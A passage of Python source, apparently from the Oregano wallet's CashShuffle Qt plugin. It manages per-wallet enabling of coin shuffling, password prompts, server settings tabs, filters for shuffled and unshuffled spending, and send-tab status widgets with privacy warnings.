Plugin.network_dialog = gui.nd # each time we are stopped, our module gets re-imported and we lose globals... so try and recapture this singleton
ct = 0
for window in gui.windows:
self.on_new_window(window)
ct += 1
self.on_network_dialog(Plugin.network_dialog) # If we have a network dialgog, add self to network dialog
self.initted = True
self._hide_history_txs = bool(gui.config.get(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, False))
self.print_error("Initialized (had {} extant windows).".format(ct))
self._hide_history_txs_check()
@hook
def on_network_dialog(self, nd):
Plugin.network_dialog = nd
if not nd: return
self.print_error("OnNetworkDialog", str(nd))
if not hasattr(nd, "__shuffle_settings__") or not nd.__shuffle_settings__:
nd.__shuffle_settings__ = st = SettingsTab(parent=nd.nlayout.tabs, config=nd.nlayout.config)
nd.nlayout.tabs.addTab(st, QIcon(':icons/CashShuffleLogos/logo-vertical.svg'), _("CashShuffle"))
st.applyChanges.connect(Plugin.try_to_apply_network_dialog_settings)
elif nd.__shuffle_settings__:
# they may have a fake view if they didn't apply the last settings, refresh the view
st = nd.__shuffle_settings__
st.refreshFromSettings()
@hook
def window_update_status(self, window):
but = getattr(window, '__shuffle__status__button__', None)
if but:
but.update_cashshuffle_icon()
def show_cashshuffle_tab_in_network_dialog(self, window):
window.gui_object.show_network_dialog(window)
nd = Plugin.network_dialog
if nd and getattr(nd, '__shuffle_settings__', None):
st = nd.__shuffle_settings__
nd.nlayout.tabs.setCurrentWidget(st)
nd.activateWindow()
return True
return False
def del_network_dialog_tab(self):
# delete the shuffle settings widget
if Plugin.network_dialog and hasattr(Plugin.network_dialog, '__shuffle_settings__'):
nd = Plugin.network_dialog
st = Plugin.network_dialog.__shuffle_settings__
if st:
idx = nd.nlayout.tabs.indexOf(st)
if idx > -1:
if nd.nlayout.tabs.currentIndex() == idx:
nd.nlayout.tabs.setCurrentIndex(0)
nd.nlayout.tabs.removeTab(idx)
st.kill()
st.setParent(None)
st.deleteLater() # need to call this otherwise it sticks around :/
st = None
Plugin.network_dialog.__shuffle_settings__ = None
self.print_error("Removed CashShuffle network settings tab")
def window_has_cashshuffle(self, window):
return window in self.windows
def window_wants_cashshuffle(self, window):
return window.wallet.storage.get(ConfKeys.PerWallet.ENABLED, False)
def window_set_wants_cashshuffle(self, window, b):
window.wallet.storage.put(ConfKeys.PerWallet.ENABLED, bool(b))
def window_set_cashshuffle(self, window, b):
if not b and self.window_has_cashshuffle(window):
self._disable_for_window(window)
elif b and not self.window_has_cashshuffle(window):
self._enable_for_window(window)
self.window_set_wants_cashshuffle(window, b)
def _window_set_disabled_extra(self, window):
self._window_clear_disabled_extra(window)
window.__disabled_sendtab_extra__ = SendTabExtraDisabled(window)
def _window_clear_disabled_extra(self, window):
extra = getattr(window, "__disabled_sendtab_extra__", None)
if extra:
extra.setParent(None) # python will gc this badboy
delattr(window, "__disabled_sendtab_extra__")
del extra # hopefully object refct goes immediately to 0 and this widget dies quickly.
return True
@classmethod
def is_wallet_cashshuffle_compatible(cls, window):
from oregano.wallet import ImportedWalletBase, Multisig_Wallet
if (window.wallet.is_watching_only()
or window.wallet.is_hardware()
or isinstance(window.wallet, (Multisig_Wallet, ImportedWalletBase))):
# wallet is watching-only, multisig, or hardware so.. not compatible
return False
return True
def add_button_to_window(self, window):
if not hasattr(window, '__shuffle__status__button__'):
from .qt_status_bar_mgr import ShuffleStatusBarButtonMgr
window.__shuffle__status__button__ = ShuffleStatusBarButtonMgr(self, window)
window.print_error("Added cashshuffle status button")
@classmethod
def remove_button_from_window(cls, window):
if hasattr(window, '__shuffle__status__button__'):
window.__shuffle__status__button__.remove()
delattr(window, '__shuffle__status__button__')
window.print_error("Removed cashshuffle status button")
@hook
def on_new_window(self, window):
if not self.is_wallet_cashshuffle_compatible(window):
# wallet is watching-only, multisig, or hardware so.. mark it permanently for no cashshuffle
self.window_set_cashshuffle(window, False)
window.update_status() # this has the side-effect of refreshing the cash shuffle status bar button's context menu (which has actions even for disabled/incompatible windows)
return
self.add_button_to_window(window) # unconditionally add the button if compatible -- they may want to enable it later
if window.wallet and not self.window_has_cashshuffle(window):
if self.window_wants_cashshuffle(window):
self._enable_for_window(window) or self._window_add_to_disabled(window)
else:
self._window_add_to_disabled(window)
def _enable_for_window(self, window):
name = window.wallet.basename()
self.print_error("Window '{}' registered, performing window-specific startup code".format(name))
if window.gui_object.warn_if_no_secp(
parent=window,
message=_("CashShuffle requires libsecp; cannot enable shuffling for this wallet."),
icon=QMessageBox.Critical):
self.print_error("Refusing to enable CashShuffle for window '{}' because no libsecp :(".format(name))
return
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
cached_password = window.gui_object.get_cached_password(window.wallet)
password = None
while window.wallet.has_password():
msg = _("CashShuffle requires access to '{}'.").format(name) + "\n" + _('Please enter your password')
if cached_password:
password = cached_password
cached_password = None
else:
pwdlg = PasswordDialog(parent=window.top_level_window(), msg=msg)
password = pwdlg.run()
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if password is None:
# User cancelled password input
if not self.warn_if_shuffle_disable_not_ok(window, msg=_('CashShuffle will now be <i>disabled</i> for a wallet which has previously had it <b>enabled</b>. Are you sure?')):
# User was warned and opted to try again to enable
continue
self.window_set_cashshuffle(window, False)
window.show_error(_("CashShuffle password prompt canceled; disabling for this wallet."), parent=window)
return
try:
window.wallet.check_password(password)
break
except Exception as e:
window.show_error(str(e), parent=window)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
continue
network_settings = Plugin.get_network_settings(window.config)
if not network_settings:
network_settings = self.settings_dialog(window, msg=_("Please choose a CashShuffle server"), restart_ask = False)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if not network_settings:
self.window_set_cashshuffle(window, False)
window.show_error(_("Can't get network, disabling CashShuffle."), parent=window)
return
self._delete_old_keys(window.wallet)
self._window_remove_from_disabled(window)
network_settings = copy.deepcopy(network_settings)
network_settings['host'] = network_settings.pop('server')
monkey_patches_apply(window)
self.windows.append(window)
self._increment_session_counter(window)
window.update_status()
window.utxo_list.update()
start_background_shuffling(window, network_settings, password=password)
return True
@hook
def utxo_list_item_setup(self, utxo_list, item, x, name):
my_custom_item_setup(utxo_list, item, x, name)
@hook
def utxo_list_context_menu_setup(self, utxo_list, menu, selected):
window = utxo_list.parent
if window in self.windows:
my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected)
@hook
def history_list_filter(self, history_list, h_item, label):
# NB: 'h_item' might be None due to performance reasons
if self._hide_history_txs:
return bool(label.startswith("Shuffle ") # this string is not translated for performance reasons. _make_label also does not translate this string.
and ( any( x for x in BackgroundShufflingThread.SCALE_ARROWS
if x in label )
or BackgroundShufflingThread.SCALE_ARROW_UNKNOWN in label
)
)
return None
@hook
def history_list_context_menu_setup(self, history_list, menu, item, tx_hash):
# NB: We unconditionally create this menu if the plugin is loaded because
# it's possible for any wallet, even a watching-only wallet to have
# shuffle tx's with the correct labels (if the user uses labelsync or
# has imported labels).
menu.addSeparator()
def action_callback():
self._hide_history_txs = not self._hide_history_txs
Plugin.gui.config.set_key(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, self._hide_history_txs, save=True)
action.setChecked(self._hide_history_txs)
if self._hide_history_txs:
tip = _("Shuffle transactions are now hidden")
else:
tip = _("Shuffle transactions are now shown")
QToolTip.showText(QCursor.pos(), tip, history_list)
history_list.update() # unconditionally update this history list as it may be embedded in the address_detail window and not a global history list..
for w in Plugin.gui.windows:
# Need to update all the other open windows.
# Note: We still miss any other open windows' address-detail
# history lists with this.. but that's ok as most of the
# time it won't be noticed by people and actually
# finding all those windows would just make this code
# less maintainable.
if history_list is not w.history_list: # check if not already updated above
w.history_list.update()
action = menu.addAction(_("Hide shuffle transactions"), action_callback)
action.setCheckable(True)
action.setChecked(self._hide_history_txs)
def on_close(self):
''' This is called on plugin unload/disable '''
self.del_network_dialog_tab()
PoolsWinMgr.killInstance()
for window in self.windows.copy():
self.on_close_window(window)
for window in self.disabled_windows.copy():
self.on_close_window(window)
if self.gui:
for window in self.gui.windows:
# lastly, we do this for ALL the extant wallet windows because all
# of their CashShuffle context menus attached to the cashshuffle
# status button need updating when the plugin is exited. Note
# that there may be windows in this set (incompatible windows)
# that aren't in either of the above 2 sets of windows.
window.update_status()
self.initted = False
Plugin.instance = None
self.print_error("Plugin closed")
assert len(self.windows) == 0 and len(self.disabled_windows) == 0, (self.windows, self.disabled_windows)
self._hide_history_txs_check()
def _hide_history_txs_check(self):
# Handle possibility that now that plugin is closed or opened, shuffle tx's are hidden or not hidden. hide/unhide them
if self._hide_history_txs and Plugin.gui:
def refresh_history_lists(gui):
for w in gui.windows:
w.history_list.update()
QTimer.singleShot(250, lambda: refresh_history_lists(Plugin.gui))
@hook
def on_close_window(self, window):
def didRemove(window):
self.print_error("Window '{}' removed".format(window.wallet.basename()))
self.remove_button_from_window(window)
if self._window_remove_from_disabled(window):
didRemove(window)
return
if self._disable_for_window(window, add_to_disabled = False):
didRemove(window)
return
def _disable_for_window(self, window, add_to_disabled = True):
if window not in self.windows:
return
name = window.wallet.basename()
if window.background_process:
self.print_error("Joining background_process...")
window.background_process.join()
window.background_process.logger.disconnectAll(); window.background_process.logger.deleteLater()
window.background_process = None
self.print_error("Window '{}' closed, ended shuffling for its wallet".format(name))
self.windows.remove(window)
monkey_patches_remove(window)
window.utxo_list.update()
window.update_status()
self.print_error("Window '{}' disabled".format(name))
if add_to_disabled:
self._window_add_to_disabled(window)
else:
self._window_remove_from_disabled(window)
return True
def _window_add_to_disabled(self, window):
if window not in self.disabled_windows:
self._window_set_disabled_extra(window)
self.disabled_windows.append(window)
window.update_status() # ensure cashshuffle icon has the right menus, etc
return True
def _window_remove_from_disabled(self, window):
self._window_clear_disabled_extra(window)
if window in self.disabled_windows:
self.disabled_windows.remove(window)
return True
@hook
def on_new_password(self, window, old, new):
if getattr(window, 'background_process', None):
self.print_error("Got new password for wallet {} informing background process...".format(window.wallet.basename() if window.wallet else 'UNKNOWN'))
window.background_process.set_password(new)
@hook
def on_spend_coins(self, window, coins):
if (not coins or window not in self.windows
# the coin may not be "mine" if doing private key -> sweep
# in that case, just abort this as it doesn't matter what
# mode the send tab is in
or (window.tx_external_keypairs
and not window.wallet.is_mine(coins[0]['address']))):
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
is_shuffled = CoinUtils.is_coin_shuffled(window.wallet, coins[0]) # check coins[0]
if spend_mode == extra.SpendingModeShuffled and not is_shuffled:
# Coin is not shuffled, spend mode is Shuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeUnshuffled)
elif spend_mode == extra.SpendingModeUnshuffled and is_shuffled:
# Coin is shuffled, spend mode is UnShuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeShuffled)
@hook
def spendable_coin_filter(self, window, coins):
if not coins or window not in self.windows:
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
external_coin_addresses = set() # this is only ever used if they are doing a sweep. in which case we always allow the coins involved in the sweep
for pubkey in window.tx_external_keypairs:
a = Address.from_pubkey(pubkey)
external_coin_addresses.add(a)
if spend_mode == extra.SpendingModeShuffled:
# in Cash-Shuffle mode + shuffled spending we can ONLY spend shuffled coins + unshuffled living on a shuffled coin address
shuf_adrs_seen = set()
shuf_coins_seen = set()
for coin in coins.copy():
if coin['address'] in external_coin_addresses:
# completely bypass this filter for external keypair dict
# which is only used for sweep dialog in send tab
continue
is_shuf_adr = CoinUtils.is_shuffled_address(window.wallet, coin['address'])
if is_shuf_adr:
shuf_adrs_seen.add(coin['address'])
if (not CoinUtils.is_coin_shuffled(window.wallet, coin)
and not is_shuf_adr): # we allow coins sitting on a shuffled address to be "spent as shuffled"
coins.remove(coin)
else:
shuf_coins_seen.add(CoinUtils.get_name(coin))
# NEW! Force co-spending of other coins sitting on a shuffled address (Fix #3)
for adr in shuf_adrs_seen:
adr_coins = window.wallet.get_addr_utxo(adr)
for name, adr_coin in adr_coins.items():
if name not in shuf_coins_seen and not adr_coin['is_frozen_coin']:
coins.append(adr_coin)
shuf_coins_seen.add(name)
elif spend_mode == extra.SpendingModeUnshuffled:
# in Cash-Shuffle mode + unshuffled spending we can ONLY spend unshuffled coins (not sitting on a shuffled address)
for coin in coins.copy():
if ((CoinUtils.is_coin_shuffled(window.wallet, coin)
or is_coin_busy_shuffling(window, coin)
or CoinUtils.is_shuffled_address(window.wallet, coin['address']))
and coin['address'] not in external_coin_addresses):
coins.remove(coin)
@hook
def balance_label_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf = shuf
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
window.send_tab_shuffle_extra.refresh(shuf, unshuf, uprog, usas)
if nShuf:
return (_('Shuffled: {} {} in {} Coin'),
_('Shuffled: {} {} in {} Coins'))[0 if nShuf == 1 else 1].format(window.format_amount(totShuf).strip(), window.base_unit(), nShuf)
return None
@hook
def not_enough_funds_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf, totUnshuf, nUnshuf, totInProg, nInProg = *shuf, *unshuf, *uprog
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
extra = window.send_tab_shuffle_extra
extra.refresh(shuf, unshuf, uprog)
spend_mode = extra.spendingMode()
rets = []
if spend_mode == extra.SpendingModeShuffled:
if totUnshuf:
rets += [_("{} {} are unshuffled").format(window.format_amount(totUnshuf).strip(), window.base_unit())]
elif spend_mode == extra.SpendingModeUnshuffled:
if totShuf:
rets += [_("{} {} are shuffled").format(window.format_amount(totShuf).strip(), window.base_unit())]
if totInProg:
rets += [_("{} {} are busy shuffling").format(window.format_amount(totInProg).strip(), window.base_unit())]
return ') ('.join(rets) or None
@hook
def get_change_addrs(self, wallet):
for window in self.windows:
if wallet == window.wallet:
change_addrs = [wallet.cashshuffle_get_new_change_address()]
wallet.print_error("CashShuffle: reserving change address",change_addrs[0].to_ui_string())
return change_addrs
@hook
def do_clear(self, w):
for window in self.windows:
if w is window:
extra = getattr(w, 'send_tab_shuffle_extra', None)
if extra:
extra.do_clear()
return
def restart_all(self):
for window in self.windows:
bp = window.background_process
if bp:
password = bp.get_password()
network_settings = Plugin.get_network_settings(window.config)
if network_settings:
bp.join()
# kill the extant console logger as its existence can cause subtle bugs
bp.logger.disconnectAll(); bp.logger.deleteLater(); bp.logger = None
network_settings['host'] = network_settings.pop('server')
window.background_process = None; del bp
start_background_shuffling(window, network_settings, password=password)
window.print_error("CashShuffle restarted for wallet")
nd = Plugin.network_dialog
# force network settings tab to also refresh itself on restart to keep it in synch with other possible settings dialogs
if nd:
st = getattr(nd, "__shuffle_settings__", None)
if st: st.refreshFromSettings()
else:
window.print_error("ERROR: could not load network settings, FIXME!")
else:
window.print_error("WARNING: Window lacks a background_process, FIXME!")
def view_pools(self, window):
assert isinstance(window, ElectrumWindow), "view_pools must be passed an ElectrumWindow object! FIXME!"
settings = __class__.get_and_validate_network_settings(window.config)
if settings:
sdict = settings.copy()
sdict['name'] = "{}:{}".format(sdict['server'], sdict['info'])
PoolsWinMgr.show(sdict, settings, window.config, parent_window=window, modal=False)
else:
# this should not normally be reachable in the UI, hence why we don't i18n the error string.
window.show_error("CashShuffle is not properly set up -- no server defined! Please select a server from the settings.")
def restart_cashshuffle(self, window, msg = None, parent = None):
if (parent or window).question("{}{}".format(msg + "\n\n" if msg else "", _("Restart the CashShuffle plugin now?")),
app_modal=True):
self.restart_all()
window.notify(_("CashShuffle restarted"))
def settings_dialog(self, window, msg=None, restart_ask = True):
def window_parent(w):
# this is needed because WindowModalDialog overrides window.parent
if callable(w.parent): return w.parent()
return w.parent
while not isinstance(window, ElectrumWindow) and window and window_parent(window):
# MacOS fixups -- we can get into a situation where we are created without the ElectrumWindow being an immediate parent or grandparent
window = window_parent(window)
assert window and isinstance(window, ElectrumWindow)
d = SettingsDialog(title=_("CashShuffle Settings"), config=window.config, message=msg)
try:
server_ok = False
ns = None
while not server_ok:
if not d.exec_():
return
else:
ns = d.get_form()
server_ok = d.serverOk
if not server_ok:
server_ok = Plugin.show_bad_server_box()
if ns:
Plugin.save_network_settings(window.config, ns)
if restart_ask:
self.restart_cashshuffle(window, msg = _("CashShuffle must be restarted for the server change to take effect."))
return ns
finally:
d.deleteLater()
del d
@staticmethod
def show_bad_server_box():
return bool(QMessageBox.critical(None, _("Error"), _("Unable to connect to the specified server."), QMessageBox.Retry|QMessageBox.Ignore, QMessageBox.Retry) == QMessageBox.Ignore)
@staticmethod
def try_to_apply_network_dialog_settings(settings_tab):
ns = settings_tab.get_form()
if ns and (settings_tab.serverOk or Plugin.show_bad_server_box()):
Plugin.save_network_settings(settings_tab.config, ns) # save settings first.
gui = Plugin.gui
instance = Plugin.instance
window = None
# Next, try and get a wallet window to query user for plugin restart. If no window found, that's ok. Restart won't be necessary. :)
if instance and instance.windows:
# first try and get a window that actually has cashshuffle running, as that's only polite
window = instance.windows[-1]
elif instance and instance.disabled_windows:
# ok, no enabled windows -- next, get a window that is cashshuffle compatible, if any exist
window = instance.disabled_windows[-1]
elif gui and gui.windows:
# If that fails, get any old window...
window = gui.windows[-1]
# NB: if no window at this point, settings will take effect next time CashShuffle is enabled for a window
if window and instance:
# window will raise itself.
instance.restart_cashshuffle(window,
msg = _("CashShuffle must be restarted for the server change to take effect."),
parent = Plugin.network_dialog)
@staticmethod
def save_network_settings(config, network_settings):
ns = copy.deepcopy(network_settings)
print_error("Saving network settings: {}".format(ns))
config.set_key(ConfKeys.Global.SERVER, ns)
@staticmethod
def get_network_settings(config):
return copy.deepcopy(config.get(ConfKeys.Global.SERVER, None))
@staticmethod
def get_and_validate_network_settings(config):
selected = dict()
try:
# try and pre-populate from config
current = __class__.get_network_settings(config)
dummy = (current["server"], current["info"], current["ssl"]); del dummy;
selected = current
except (KeyError, TypeError):
pass
return selected
def settings_widget(self, window):
weakMeth = Weak(self.settings_dialog)
weakWindow = Weak(window)
return EnterButton(_('Settings'), lambda: weakMeth(weakWindow))
def requires_settings(self):
return True
def _delete_old_keys(self, config_or_wallet):
getter, setter, defuncts, thing = None, None, tuple(), None
if isinstance(config_or_wallet, SimpleConfig):
config = config_or_wallet
getter = lambda k: config.get(k)
setter = lambda k: config.set_key(k, None, save=True)
defuncts = ConfKeys.Global.DEFUNCT
thing = "config"
elif isinstance(config_or_wallet, Abstract_Wallet):
storage = config_or_wallet.storage
getter = lambda k: storage.get(k)
setter = lambda k: storage.put(k, None)
defuncts = ConfKeys.PerWallet.DEFUNCT
thing = "wallet.storage for {}".format(config_or_wallet.basename())
if thing:
ct = 0
for k in defuncts:
if getter(k) is not None:
ct += 1
setter(k)
if ct:
self.print_error("Found and removed {} deprecated keys from {}".format(ct, thing))
# counters: shuffle counter and session counter
@classmethod
def _increment_generic_counter(cls, window, key):
window.wallet.storage.put(key, cls._get_generic_counter(window, key) + 1)
@staticmethod
def _get_generic_counter(window, key):
try:
ctr = int(window.wallet.storage.get(key, 0))
except (ValueError, TypeError): # paranoia
# stored value must have not been an int. :(
ctr = 0
return ctr
@classmethod
def _increment_session_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _get_session_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _increment_shuffle_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
@classmethod
def _get_shuffle_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
# /counters
def warn_if_shuffle_disable_not_ok(self, window, *, msg=None):
'''
Determine if disabling (or not re-enabling in the case of a pw dialog
cancel) of cash shuffle is ok for this wallet.
This method may block the GUI with a local modal dialog asking the user
if they are sure.
In the future, we may also put code to say "shuffles pending, please
wait..." in a cancellable progress-type dialog.
Returns True if calling code should proceed with disable action.
'''
# Note -- window may not necessarily be shuffle patched as this
# may be called from the password dialog
noprompt = window.wallet.storage.get(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, False)
if not noprompt and type(self)._get_session_counter(window) > 0:
if msg is None:
msg = _('You are now <i>disabling</i> CashShuffle for this wallet. Are you sure?')
ans, chk = window.question(
msg=msg,
informative_text=_('Spending and linking coins with CashShuffle disabled may compromise your privacy for both shuffled and unshuffled coins in this wallet.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
window.wallet.storage.put(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, bool(chk))
return bool(ans)
return True
class SendTabExtraDisabled(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user CashShuffle was disabled for this wallet '''
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 6, 6, 6)
self.txt = "<big><b>{}</b></big> {}".format(_("CashShuffle Disabled"), _("Your shuffled and unshuffled coins can be mixed and spent together."))
self.msg = "{}\n\n{}\n\n{}".format(_("When CashShuffle is disabled, your privacy on the blockchain is reduced to traditional levels, and 'chainalysis' becomes easier (your transactions can be associated with one another)."),
_("This spending mode is the same as previous versions of Oregano, which did not offer CashShuffle."),
_("You may toggle CashShuffle back on at any time using the 'CashShuffle' icon in the status bar."))
self.titleLabel = HelpLabel(self.txt, self.msg)
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft|Qt.AlignVCenter)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(75, ":icons/CashShuffleLogos/logo-vertical_grayed.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
icon.setToolTip(_("CashShuffle Disabled"))
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
class SendTabExtra(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user of shuffled coin status & totals '''
needRefreshSignal = pyqtSignal() # protocol thread uses this signal to tell us that amounts have changed
needWalletSaveSignal = pyqtSignal() # protocol thread uses this signal to tell us that the wallet should be saved to disk using storage.write
pixmap_cached = None # singleton gets initialized first time an instance of this class is constructed. Contains the cashshuffle_icon5.png scaled to 125px width
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 12, 6, 12)
self.msg = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("If insufficient shuffled funds are available, you can wait a few minutes as coins are shuffled in the background."))
self.msg2 = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("Some of your unshuffled funds may be temporarily locked while the shuffle operation is performed. If you want to unlock these funds immediately, you can use the 'Pause Shuffling' button to do so."))
self.titleLabel = HelpLabel("", "") # Will be initialized by self.onSpendRadio() below
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
self.spendButtons = QButtonGroup(self)
# Shuffled
self.shufLabel = HelpLabel(_("Shuffled available:"), self.msg)
m = _("Shuffled (private) funds")
self.shufLabel.setToolTip(m)
self.shufLabel.setParent(self)
l.addWidget(self.shufLabel, 1, 1)
self.amountLabel = QLabel("", self); self.amountLabel.setToolTip(m)
l.addWidget(self.amountLabel, 1, 2)
self.numCoinsLabel = QLabel("", self); self.numCoinsLabel.setToolTip(m)
l.addWidget(self.numCoinsLabel, 1, 3)
self.spendShuffled = QRadioButton(_("Spend Shuffled"), self); self.spendShuffled.setToolTip(_("Spend only your shuffled (private) coins"))
l.addWidget(self.spendShuffled, 1, 4)
self.spendButtons.addButton(self.spendShuffled)
# Unshuffled
self.unshufLabel = HelpLabel(_("Unshuffled available:"), self.msg2)
m = _("Funds that are not yet shuffled")
self.unshufLabel.setToolTip(m)
self.unshufLabel.setParent(self)
l.addWidget(self.unshufLabel, 2, 1)
self.amountLabelUnshuf = QLabel("", self); self.amountLabelUnshuf.setToolTip(m)
l.addWidget(self.amountLabelUnshuf, 2, 2)
self.numCoinsLabelUnshuf = QLabel("", self); self.numCoinsLabelUnshuf.setToolTip(m)
l.addWidget(self.numCoinsLabelUnshuf, 2, 3)
self.spendUnshuffled = QRadioButton(_("Spend Unshuffled"), self); self.spendUnshuffled.setToolTip(_("Spend only your unshuffled coins"))
l.addWidget(self.spendUnshuffled, 2, 4)
self.spendButtons.addButton(self.spendUnshuffled)
self.spendShuffled.setChecked(True)
# In Progress
self.msg3 = _("Funds that are busy being shuffled are not available for spending until they are shuffled. To spend these funds immediately, use the 'Pause Shuffling' button to temporarily suspend CashShuffle.")
self.busyLbl = HelpLabel(_("Busy shuffling:"), self.msg3)
self.busyLbl.setParent(self)
m = _("Funds currently being shuffled")
self.busyLbl.setToolTip(m)
l.addWidget(self.busyLbl, 3, 1)
self.amountLabelBusy = QLabel("", self); self.amountLabelBusy.setToolTip(m)
l.addWidget(self.amountLabelBusy, 3, 2)
self.numCoinsLabelBusy = QLabel("", self); self.numCoinsLabelBusy.setToolTip(m)
l.addWidget(self.numCoinsLabelBusy, 3, 3)
self.pauseBut = QPushButton("", self) # Button text filled in by refresh() call
self.pauseBut.setDefault(False); self.pauseBut.setAutoDefault(False); self.pauseBut.setCheckable(True)
self.pauseBut.setToolTip(_("Pause/Unpause the background shuffle process (frees up 'busy' coins for spending)"))
l.addWidget(self.pauseBut, 3, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelUnshuf, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelBusy, Qt.AlignLeft)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(125, ":icons/CashShuffleLogos/logo-vertical.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
self.spendButtons.buttonClicked.connect(self.onSpendRadio)
self.window.history_updated_signal.connect(self.refresh)
self.needRefreshSignal.connect(self.refresh)
self.needRefreshSignal.connect(self.window.update_fee)
self.needWalletSaveSignal.connect(self.wallet.storage.write)
self.spendButtons.buttonClicked.connect(lambda x="ignored": self.refresh())
self.pauseBut.clicked.connect(self.onClickedPause)
self.onSpendRadio() # sets up the title label and possibly warns user if starting up in "spend unshuffled" mode
def onSpendRadio(self, ignored = None):
which = self.spendingMode()
if which == self.SpendingModeShuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <b>shuffled</b> funds will be sent")))
self.titleLabel.help_text = self.msg
self.forceUnpause()
#self.pauseBut.setDisabled(True)
elif which == self.SpendingModeUnshuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <i>unshuffled</i> funds will be sent")))
self.titleLabel.help_text = self.msg2
#self.pauseBut.setEnabled(bool(self.window.background_process and not self.window.background_process.is_offline_mode()))
noprompt = self.wallet.storage.get(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, False)
if not noprompt:
ans, chk = self.window.question(
msg=_('You are now spending <b><i>unshuffled</i></b> coins. Are you sure?'),
informative_text=_('Spending and linking these coins may compromise your privacy not only for new received coins, but also for your past spending of shuffled coins.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
self.wallet.storage.put(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, bool(chk))
if not ans:
self.spendShuffled.animateClick()
return
self.window.update_fee()
def onClickedPause(self, b):
if self.window.background_process:
self.window.background_process.set_paused(b)
# Note: GUI refresh() wil later also set this string but we set it immediately here so UI feel peppier
self.pauseBut.setText(_("Pause Shuffling") if not b else _("Shuffling Paused"))
self.window.utxo_list.update()
def do_clear(self): # called by plugin hook do_clear()
self.forceUnpause()
self.refresh()
def forceUnpause(self):
if self.window.background_process:
self.window.background_process.set_paused(False)
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling"))
def showEvent(self, e):
super().showEvent(e)
self.refresh()
_templates = tuple()
@rate_limited(0.250)
def refresh(self, shuf=None, unshuf=None, inprog=None, usas=None):
